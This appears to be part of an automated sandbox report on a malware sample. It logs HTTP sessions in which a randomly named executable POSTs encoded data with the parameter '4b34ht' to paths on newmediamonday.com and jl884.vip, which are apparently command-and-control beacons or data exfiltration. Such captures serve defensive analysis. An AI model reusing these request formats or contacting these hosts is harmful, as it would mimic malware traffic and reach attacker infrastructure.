                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6c 30 59 55 4e 56 55 75 5a 48 6e 51 52 61 6b 38 59 42 41 32 64 68 51 53 59 6a 6b 46 4e 37 47 36 37 5a 32 62 2f 66 44 32 44 4f 33 66 42 76 41 73 59 47 59 6a 54 48 41 37 66 42 64 6d 63 58 31 2f 4d 79 44 65 76 49 43 67 30 6a 4e 6f 4e 36 5a 47 6d 35 6b 31 50 4b 66 38 56 63 6e 6e 79 64 62 31 34 30 65 55 59 51 37 77 4d 46 48 72 32 67 50 2f 67 77 4a 6c 7a 66 63 58 6c 76 77 2f 68 38 4e 64 31 67 49 45 31 49 34 75 6c 48 6e 6c 63 47 68 51 77 66 37 51 2b 35 58 74 6f 72 71 44 77 4b 45 51 63 44 41 47 6f 6c 47 31 49 4f 39 74 72 4f 54 39 70 35 35 49 32 6d 42 37 69 66 6b 6a 55 52 74 63 6a 33 39 58 2b 77 55 3d
                                          Data Ascii: 4b34ht=l0YUNVUuZHnQRak8YBA2dhQSYjkFN7G67Z2b/fD2DO3fBvAsYGYjTHA7fBdmcX1/MyDevICg0jNoN6ZGm5k1PKf8Vcnnydb140eUYQ7wMFHr2gP/gwJlzfcXlvw/h8Nd1gIE1I4ulHnlcGhQwf7Q+5XtorqDwKEQcDAGolG1IO9trOT9p55I2mB7ifkjURtcj39X+wU=
                                          May 27, 2024 12:45:13.943128109 CEST247INHTTP/1.1 302 Moved Temporarily
                                          Date: Mon, 27 May 2024 10:45:13 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Location: https://newmediamonday.com
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          38192.168.2.549753173.254.28.213806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:15.812705040 CEST794OUTPOST /f1h2/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.newmediamonday.com
                                          Origin: http://www.newmediamonday.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.newmediamonday.com/f1h2/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6c 30 59 55 4e 56 55 75 5a 48 6e 51 52 36 30 38 55 43 59 32 4b 52 51 52 47 54 6b 46 48 62 48 7a 37 5a 36 62 2f 65 58 6d 43 38 6a 66 50 74 59 73 4a 31 41 6a 53 48 41 37 4c 78 64 6a 59 58 31 30 4d 31 4b 68 76 4b 57 67 30 6a 78 6f 4e 34 42 47 6d 4f 49 79 4f 61 66 2b 65 38 6e 6c 2f 39 62 31 34 30 65 55 59 55 58 57 4d 46 50 72 32 51 2f 2f 68 53 68 36 6f 2f 63 55 69 76 77 2f 72 63 4e 5a 31 67 49 32 31 4d 5a 46 6c 46 66 6c 63 44 4e 51 77 4f 37 54 30 35 58 72 6d 4c 72 49 33 71 4d 59 46 53 68 48 31 48 7a 49 59 65 34 55 6e 59 2b 58 7a 62 78 67 6c 47 74 44 79 4d 73 55 46 68 4d 31 35 55 74 6e 67 6e 41 64 30 69 6b 4b 42 70 38 48 57 58 42 47 57 72 6e 63 44 6d 59 69
                                          Data Ascii: 4b34ht=l0YUNVUuZHnQR608UCY2KRQRGTkFHbHz7Z6b/eXmC8jfPtYsJ1AjSHA7LxdjYX10M1KhvKWg0jxoN4BGmOIyOaf+e8nl/9b140eUYUXWMFPr2Q//hSh6o/cUivw/rcNZ1gI21MZFlFflcDNQwO7T05XrmLrI3qMYFShH1HzIYe4UnY+XzbxglGtDyMsUFhM15UtngnAd0ikKBp8HWXBGWrncDmYi
                                          May 27, 2024 12:45:16.509840965 CEST247INHTTP/1.1 302 Moved Temporarily
                                          Date: Mon, 27 May 2024 10:45:16 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Location: https://newmediamonday.com
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          39192.168.2.549754173.254.28.213806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:18.968502045 CEST1811OUTPOST /f1h2/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.newmediamonday.com
                                          Origin: http://www.newmediamonday.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.newmediamonday.com/f1h2/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6c 30 59 55 4e 56 55 75 5a 48 6e 51 52 36 30 38 55 43 59 32 4b 52 51 52 47 54 6b 46 48 62 48 7a 37 5a 36 62 2f 65 58 6d 43 38 37 66 50 65 51 73 62 6b 41 6a 41 33 41 37 49 78 64 69 59 58 31 31 4d 7a 6a 6f 76 4b 71 65 30 6d 39 6f 50 64 56 47 67 2f 49 79 48 61 66 2b 52 63 6e 6b 79 64 61 74 34 30 76 64 59 51 33 57 4d 46 50 72 32 53 33 2f 68 41 4a 36 71 2f 63 58 6c 76 77 4a 68 38 4e 78 31 67 51 4d 31 4e 5a 7a 69 30 2f 6c 64 6e 74 51 79 38 44 54 38 35 58 70 6c 4c 72 62 33 71 52 47 46 53 38 38 31 44 7a 32 59 63 6f 55 69 38 48 62 67 66 6c 36 35 45 34 75 78 2b 68 34 59 6c 63 48 37 6d 64 6b 38 6b 6b 72 35 51 49 33 43 4a 41 64 44 57 49 34 4d 2b 76 59 43 79 39 51 2b 58 73 49 6e 70 59 45 63 34 52 43 35 73 51 4f 31 76 38 70 6b 72 75 78 7a 4a 68 50 48 79 66 54 39 65 41 42 67 37 4c 6c 58 58 73 46 47 4d 35 33 46 32 78 45 50 31 4e 2f 69 4b 63 35 34 6c 63 4d 61 47 61 65 45 4c 32 38 34 32 64 64 48 67 54 31 7a 6c 30 73 55 73 7a 47 4b 66 6c 59 54 6f 77 39 38 4f 37 6f 6c 52 6a 53 32 68 56 41 76 45 36 [TRUNCATED]
                                          Data Ascii: 4b34ht=l0YUNVUuZHnQR608UCY2KRQRGTkFHbHz7Z6b/eXmC87fPeQsbkAjA3A7IxdiYX11MzjovKqe0m9oPdVGg/IyHaf+Rcnkydat40vdYQ3WMFPr2S3/hAJ6q/cXlvwJh8Nx1gQM1NZzi0/ldntQy8DT85XplLrb3qRGFS881Dz2YcoUi8Hbgfl65E4ux+h4YlcH7mdk8kkr5QI3CJAdDWI4M+vYCy9Q+XsInpYEc4RC5sQO1v8pkruxzJhPHyfT9eABg7LlXXsFGM53F2xEP1N/iKc54lcMaGaeEL2842ddHgT1zl0sUszGKflYTow98O7olRjS2hVAvE6ToJt9Im1TNZlFFr0CTY61hntxArplk11gdq0Sn1mP2LC0QE/Y+XBjDZhwBsfmAmVTrw4OVy6BpUgVamPgvlSPFd4idKSo+tjfmJjlOwkl+y+9pl0a27zxZh4e0Xvpv9JrfFa1M/4DYHV0h2wt5my8APpjGkCjWRaPfMVKxERhGxOK99wG441EupSY4s1wCNStqeeniGae06HxRJMXFrvlHEG2kCzTyXmHHSR0d+5gfio4+FCkwWJBe871DY3PC5TTMqItVnbu9f9zdSl5EbjG7J8Aoo5URihGkYHMyIt4KzkwExYNXXnAZdoD3Mxy2T/UO/tpQvnGpHXmOZjAFV3L0t+wCl8pAjycCgVV159/y1p0Z/E45INnmBkZn3n7D4fx/CQdGekZlGrV8yR5AMg+1fr4O9HKA/BEn0nqQP1N5W2f3zj4EGCZ6esXzSZm/DE6PizYFApIvESmQV7aeC/LxsZ1acRHKK5Qp8YFOeiVcNJIfHlCwf4ZlqX/S8H4eCdlEclYXGAxf+Oh8+bDvdf83y1fdupkl8ImPk9TlR6Lc4DziYpgYWVJ5GGhzaE4sJft2hLnhw9X9tB+OHe0BPl7OtIQNzPW+l9DxPaQX8VmAFgVOO53lWRKcQ1g5rB+Jk3T8lVLy3hCM7t8VeUgfyxOiH1S7UHtKzDA7 [TRUNCATED]
                                          May 27, 2024 12:45:19.702219009 CEST247INHTTP/1.1 302 Moved Temporarily
                                          Date: Mon, 27 May 2024 10:45:19 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Location: https://newmediamonday.com
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          40192.168.2.549755173.254.28.213806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:21.505393982 CEST509OUTGET /f1h2/?4b34ht=o2w0OkdzOU7AeO8cST1vLwAMb2MVSZPok4SxmOvOEN/vFfcFf0cZDVwWJD0TY2twL06giNetwFt+I5xckOsROdTXbf+WwKvZ5D3dZkP4IlWKwwnosj8+1uAXlawkkcomhg==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.newmediamonday.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:22.210407019 CEST247INHTTP/1.1 302 Moved Temporarily
                                          Date: Mon, 27 May 2024 10:45:22 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Location: https://newmediamonday.com
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          41192.168.2.54975665.181.132.158806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:27.941920996 CEST747OUTPOST /viqu/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.jl884.vip
                                          Origin: http://www.jl884.vip
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.jl884.vip/viqu/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 42 58 71 53 57 32 73 42 43 44 5a 4e 66 41 65 34 41 65 70 55 47 6a 53 32 33 36 33 75 48 31 62 4d 56 61 42 55 4d 72 37 56 31 4b 34 4b 6a 35 79 32 74 45 48 72 63 70 53 42 45 35 53 75 6a 42 68 58 51 37 61 6d 62 36 6a 54 64 32 41 66 67 78 4c 66 65 4d 53 43 68 42 4b 73 4a 78 62 30 66 62 46 42 6b 64 39 52 6f 77 62 32 7a 38 72 4d 51 6d 32 4b 50 71 4b 56 39 68 7a 7a 39 31 51 2f 59 36 41 48 78 49 34 70 32 41 62 6a 57 2f 70 4a 35 54 35 48 4f 50 49 75 65 44 59 56 66 30 71 65 73 61 31 4d 79 73 44 53 4b 45 43 4a 55 62 66 6c 6f 35 4a 6c 75 58 2f 4a 53 6c 32 4f 33 78 6d 4e 4c 4d 74 76 5a 52 2f 54 4c 43 30 3d
                                          Data Ascii: 4b34ht=BXqSW2sBCDZNfAe4AepUGjS2363uH1bMVaBUMr7V1K4Kj5y2tEHrcpSBE5SujBhXQ7amb6jTd2AfgxLfeMSChBKsJxb0fbFBkd9Rowb2z8rMQm2KPqKV9hzz91Q/Y6AHxI4p2AbjW/pJ5T5HOPIueDYVf0qesa1MysDSKECJUbflo5JluX/JSl2O3xmNLMtvZR/TLC0=
                                          May 27, 2024 12:45:28.924792051 CEST778INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:28 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=2ed20434-551f-45986f4e8b2b2869bc5a37bc02223270e849; Expires=1716813928; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067287074877e0a700e6c335d6b37804cf406a8e51cba0c11;path=/;HttpOnly;Max-Age=1800
                                          jckl: U+BhHKgc/ZIXDmkfo/9koLxHCYPpU7cOzO1AIp3rpTe6YfQTY7/l+bSOPW049nEyzqB5UZAWlsF13rebgrmmwg==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: 52b2e0d15b365fdd8152ece0fcf2eda9
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          42192.168.2.54975765.181.132.158806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:30.478554964 CEST767OUTPOST /viqu/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.jl884.vip
                                          Origin: http://www.jl884.vip
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.jl884.vip/viqu/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 42 58 71 53 57 32 73 42 43 44 5a 4e 66 68 75 34 46 39 52 55 4b 54 53 35 37 61 33 75 4f 56 62 49 56 61 39 55 4d 75 44 46 32 34 4d 4b 6a 59 43 32 73 47 2f 72 52 4a 53 42 4c 5a 53 68 6e 42 68 63 51 37 57 45 62 2f 4c 54 64 32 55 66 67 31 44 66 65 39 53 46 67 52 4b 71 43 52 62 32 62 62 46 42 6b 64 39 52 6f 7a 6e 63 7a 36 44 4d 54 57 6d 4b 4f 49 69 53 30 42 7a 38 33 56 51 2f 63 36 41 44 78 49 34 66 32 46 43 32 57 39 52 4a 35 58 31 48 66 37 63 68 56 44 59 58 52 55 72 36 73 61 35 41 38 2f 37 35 57 48 6e 2b 4a 74 54 6d 67 76 6b 50 30 31 33 68 42 46 61 32 6e 69 75 36 61 38 4d 47 44 79 76 6a 56 56 69 51 7a 41 4b 59 67 35 45 4e 59 6e 69 36 6b 63 7a 52 41 73 6d 6a
                                          Data Ascii: 4b34ht=BXqSW2sBCDZNfhu4F9RUKTS57a3uOVbIVa9UMuDF24MKjYC2sG/rRJSBLZShnBhcQ7WEb/LTd2Ufg1Dfe9SFgRKqCRb2bbFBkd9Rozncz6DMTWmKOIiS0Bz83VQ/c6ADxI4f2FC2W9RJ5X1Hf7chVDYXRUr6sa5A8/75WHn+JtTmgvkP013hBFa2niu6a8MGDyvjVViQzAKYg5ENYni6kczRAsmj
                                          May 27, 2024 12:45:32.142249107 CEST778INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:31 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=fcb884f2-659c-473ac81e0635185a603f22e5ebda4194506a; Expires=1716813931; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067312296406e4c1eea5414b2beceb34febd2fb2ed6f21be1;path=/;HttpOnly;Max-Age=1800
                                          jckl: Hxy1BEi3JI8z+D5sWbMFHAk3Z4LzZA1gCjCO3E6tybxhtybMODT1Cxc6u1QCWa4cadB+OxI3a7ajJnoiQ+m6Ww==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: b3621232484904f2e328d21ac68eac2f
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}
                                          May 27, 2024 12:45:32.142525911 CEST778INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:31 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=fcb884f2-659c-473ac81e0635185a603f22e5ebda4194506a; Expires=1716813931; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067312296406e4c1eea5414b2beceb34febd2fb2ed6f21be1;path=/;HttpOnly;Max-Age=1800
                                          jckl: Hxy1BEi3JI8z+D5sWbMFHAk3Z4LzZA1gCjCO3E6tybxhtybMODT1Cxc6u1QCWa4cadB+OxI3a7ajJnoiQ+m6Ww==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: b3621232484904f2e328d21ac68eac2f
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}
                                          May 27, 2024 12:45:32.143455029 CEST778INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:31 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=fcb884f2-659c-473ac81e0635185a603f22e5ebda4194506a; Expires=1716813931; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067312296406e4c1eea5414b2beceb34febd2fb2ed6f21be1;path=/;HttpOnly;Max-Age=1800
                                          jckl: Hxy1BEi3JI8z+D5sWbMFHAk3Z4LzZA1gCjCO3E6tybxhtybMODT1Cxc6u1QCWa4cadB+OxI3a7ajJnoiQ+m6Ww==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: b3621232484904f2e328d21ac68eac2f
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          43192.168.2.54975865.181.132.158806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:33.016129971 CEST1784OUTPOST /viqu/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.jl884.vip
                                          Origin: http://www.jl884.vip
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.jl884.vip/viqu/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 42 58 71 53 57 32 73 42 43 44 5a 4e 66 68 75 34 46 39 52 55 4b 54 53 35 37 61 33 75 4f 56 62 49 56 61 39 55 4d 75 44 46 32 34 55 4b 67 71 6d 32 75 6e 2f 72 65 70 53 42 43 35 53 69 6e 42 68 37 51 37 4f 41 62 2f 50 6c 64 30 73 66 6d 53 44 66 59 50 32 46 31 42 4b 71 4e 78 62 33 66 62 46 51 6b 64 74 56 6f 7a 33 63 7a 36 44 4d 54 51 69 4b 4a 61 4b 53 34 68 7a 7a 39 31 51 7a 59 36 41 76 78 49 68 71 32 42 65 6d 57 73 78 4a 35 33 6c 48 64 6f 30 68 63 44 59 52 57 55 72 69 73 61 30 65 38 2f 33 66 57 47 54 55 4a 71 58 6d 71 6f 5a 6b 67 58 6a 33 55 32 6d 50 6b 44 6d 35 4b 59 45 51 4d 78 66 4b 53 58 65 6b 37 6a 43 44 71 38 41 38 53 57 48 2b 34 35 4c 6a 4d 6f 7a 78 46 76 32 42 4b 76 53 4d 79 61 47 4e 5a 37 65 6a 74 31 35 52 52 65 34 6b 4e 57 41 49 39 47 48 4e 75 56 4a 67 46 78 45 4f 6d 43 52 42 47 6e 44 62 75 2f 4e 78 45 55 2f 68 33 51 56 52 7a 4f 61 4d 4b 49 34 72 42 4e 45 34 5a 35 49 76 61 69 49 49 44 45 51 37 69 6d 5a 70 6c 6b 44 32 74 6c 44 32 33 78 50 4d 53 36 4f 77 67 6f 6b 45 59 53 47 [TRUNCATED]
                                          Data Ascii: 4b34ht=BXqSW2sBCDZNfhu4F9RUKTS57a3uOVbIVa9UMuDF24UKgqm2un/repSBC5SinBh7Q7OAb/Pld0sfmSDfYP2F1BKqNxb3fbFQkdtVoz3cz6DMTQiKJaKS4hzz91QzY6AvxIhq2BemWsxJ53lHdo0hcDYRWUrisa0e8/3fWGTUJqXmqoZkgXj3U2mPkDm5KYEQMxfKSXek7jCDq8A8SWH+45LjMozxFv2BKvSMyaGNZ7ejt15RRe4kNWAI9GHNuVJgFxEOmCRBGnDbu/NxEU/h3QVRzOaMKI4rBNE4Z5IvaiIIDEQ7imZplkD2tlD23xPMS6OwgokEYSG1jzdnxQ5Evs4s2VuydDcaZ5IinEqd7sRdfC8BRCJwEDlCKup0lFJVpbkax9+rsdQKVDSvr3YxyT4zoF1laoKSWd9fSXV7eUJd3n3wjYxsMKU2HesuJ46/NZqTBRUVbYXqWOaRVL8B9BB8ANZVSfAjX6FMxiSiC9w5Nchqm0kwFxg48URuunwhHzJTJoZC6VVOSTB8y6H4mNtoyVY7vkfqIS6zyejGs9bOs2oqEm/2xsnjE8kCZWWfpirfdf6PA0ULQey/aDMz6n22D4mJ5PkcZbgmHEy+BH8LoIaG94lAw8Lnpj+qwklV04/LtUkE7xNJEKiHUNl6t4GIPb+UmhkNC/ZcK14BU+ZAJ624jiDn2r9cm2SVtTEr1NUowGel3FQqDGzr3mgsReBOiA2ldycYFqwf1EnWje9JQv+2WytQ9lOHsRUt35sACuCU75sMdaufub0inCqvwxgxCeGHR2xSLcXVjlj7hwtaFSlW2fzqH/WIBTl9UpBTqtXQ26uWwcC16jNfbfwGKZK8DQOAjWsnOD6rSy/C5tP/dhOwLLB/evBDyEqwzbr+0ZUPvS0VaY/53lB0Bw62xnm1eTyPwCvav0tjHueSxUJEHD4POgf1Ius0xrVxx6mhGqm13fXSkUMYKnkWLxIDsqRN3gEPfg8LDafb+Xt7YdVS3 [TRUNCATED]
                                          May 27, 2024 12:45:35.064579010 CEST778INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:34 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=bcbe3615-9638-4f2073ab54bf092b4c9640a9033580cdd6b3; Expires=1716813933; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067345403663e11ca6cd7bbc4f64e8583e0e61441c4defe63;path=/;HttpOnly;Max-Age=1800
                                          jckl: QliM1ONpibm7gGLxB3FwJjMauN9Vjgke/D+Ap4DM8X5aIsApOJ26c6xXv3ksnnFATCOfXe72BIMCEAhmADgwAQ==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: ed4c0c90894d435a51af89e5da323a7d
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}
                                          May 27, 2024 12:45:35.064750910 CEST778INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:34 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=bcbe3615-9638-4f2073ab54bf092b4c9640a9033580cdd6b3; Expires=1716813933; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067345403663e11ca6cd7bbc4f64e8583e0e61441c4defe63;path=/;HttpOnly;Max-Age=1800
                                          jckl: QliM1ONpibm7gGLxB3FwJjMauN9Vjgke/D+Ap4DM8X5aIsApOJ26c6xXv3ksnnFATCOfXe72BIMCEAhmADgwAQ==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: ed4c0c90894d435a51af89e5da323a7d
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          44192.168.2.54975965.181.132.158806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:36.194500923 CEST500OUTGET /viqu/?4b34ht=MVCyVDN3RwNEbgSUD+0xRye29v/XSHfdB7daKMb285I6uLH+in3mV6SqMrakijFPfITBXvDDRnIloAD3dOOGlBaUMS2RVppA4PBahCfW4PrIZhDLLp/ysGvZxQcLTJd5vQ==&UxF=2Nflznk0WJ3hjv HTTP/1.1
